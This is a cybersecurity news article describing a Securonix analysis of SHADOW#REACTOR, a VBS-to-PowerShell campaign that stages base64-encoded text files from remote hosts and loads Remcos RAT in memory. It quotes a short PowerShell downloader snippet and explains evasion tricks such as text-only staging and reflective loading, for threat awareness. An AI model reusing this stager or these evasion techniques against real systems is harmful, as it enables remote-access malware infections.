Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
India Halts WhatsApp Usernames Rollout Due to Fraud Concerns
July 1, 2026
Critical Cursor IDE RCE Vulnerabilities Allow Zero-Click Prompt Injection
July 1, 2026
Automated Password Spray Attacks Target Microsoft Azure CLI
July 1, 2026
Home/Threats/Multi-Stage Windows Malware Invokes PowerShell Downloader Using Text-based Payloads Using Remote Host
Threats

Multi-Stage Windows Malware Invokes PowerShell Downloader Using Text-based Payloads Using Remote Host

Security researchers have identified SHADOW#REACTOR, a sophisticated multi-stage Windows malware campaign that signifies a notable evolution in remote access tool delivery mechanisms. The campaign...

David kimber
David kimber
January 13, 2026 3 Min Read
31 0

Security researchers have identified SHADOW#REACTOR, a sophisticated multi-stage Windows malware campaign that signifies a notable evolution in remote access tool delivery mechanisms.

The campaign demonstrates how threat actors combine traditional scripting techniques with modern obfuscation methods to bypass security defenses.

The infection begins with an obfuscated Visual Basic Script that initiates a carefully orchestrated chain of execution stages, each designed to handle specific functions while minimizing detection.

The attack vector relies on user interaction, with victims unknowingly executing a malicious VBS file typically delivered through compromised web resources or social engineering lures.

Once executed, the script launches PowerShell processes that fetch fragmented payload pieces from remote infrastructure. These fragments remain encoded as plain text files, avoiding common binary detection signatures.

Process flow using Procmon (Source - Securonix)
Process flow using Procmon (Source – Securonix)

The modular approach enables attackers to update individual stages independently without restructuring the entire chain.

The campaign showcases an unusual combination of living-off-the-land techniques and custom obfuscation layers.

Each execution stage passes control to the next through carefully managed handoffs, ensuring payload integrity across multiple downloads.

The attackers implemented redundancy checks and size validation mechanisms to guarantee successful payload reconstruction.

Securonix analysts identified the malware after the second stage revealed characteristic patterns in PowerShell command construction and base64 decoding operations.

The research team traced the infrastructure connections and matched the final payload signature to Remcos RAT, a commercially available remote administration tool repurposed for malicious use.

Win64.vbs (Source - Securonix)
Win64.vbs (Source – Securonix)

The analysis revealed that Securonix analysts’ initial detection focused on unusual wscript.exe spawning multiple PowerShell instances with extensive inline commands—a distinctive behavioral pattern rarely seen in legitimate Windows operations.

The Text-Only Staging Pipeline: A Novel Delivery Approach

The defining characteristic of SHADOW#REACTOR lies in its unconventional text-based staging mechanism.

Rather than hosting binary payloads directly, attackers maintain encoded content in plain text files including qpwoe32.txt, qpwoe64.txt, teste32.txt, teste64.txt, and config.txt.

.NET Reactor Loader functions (Source - Securonix)
.NET Reactor Loader functions (Source – Securonix)

These files contain base64-encoded assembly code that appears as harmless text data to automated security systems performing routine scans.

The PowerShell stager implements a download loop with minimum size thresholds and timeout mechanisms.

If the retrieved file falls below expected sizes, the script automatically retries the download, ensuring incomplete transmissions don’t interrupt execution.

Decode function (Source - Securonix)
Decode function (Source – Securonix)

This resilience mechanism allows operators to manage payload updates without disrupting the entire infection chain.

Once validation succeeds, subsequent stages decode and reconstruct the content into functional .NET assemblies loaded entirely in memory using reflective loading techniques.

$webClient = New-Object System.Net.WebClient
$uwehj = $webClient.DownloadString($mlkia)
$uwehj | Out-File -FilePath $Iuytq -Encoding UTF8

The text-only approach significantly complicates static detection, as security solutions typically flag binary executables rather than seemingly innocuous text files.

Combined with in-memory execution and process chain obfuscation, this staging pipeline represents a calculated effort to maintain persistence while evading endpoint detection and response systems designed to identify traditional malware delivery patterns.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackMalwareSecurityThreat

Share Article

David kimber

David kimber

David is a penetration tester turned security journalist with expertise in mobile security, IoT vulnerabilities, and exploit development. As an OSCP-certified security professional, David brings hands-on technical experience to his reporting on vulnerabilities and security research. His articles often feature detailed technical analysis of exploits and provide actionable defense recommendations. David maintains an active presence in the security research community and has contributed to multiple open-source security tools.

Previous Post

Critical OpenSSH Vulnerability Exposes Moxa Ethernet Switches to Remote Code Execution

Next Post

HoneyTrap – A New LLM Defense Framework to Counter Jailbreak Attacks

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Critical Fluentd Vulnerabilities Allow Remote Code Execution
July 1, 2026
Weaponized Google Ads Install Malicious Claude Code to Hijack macOS
July 1, 2026
Critical Adobe ColdFusion Vulnerabilities Let Attackers Run Code
July 1, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us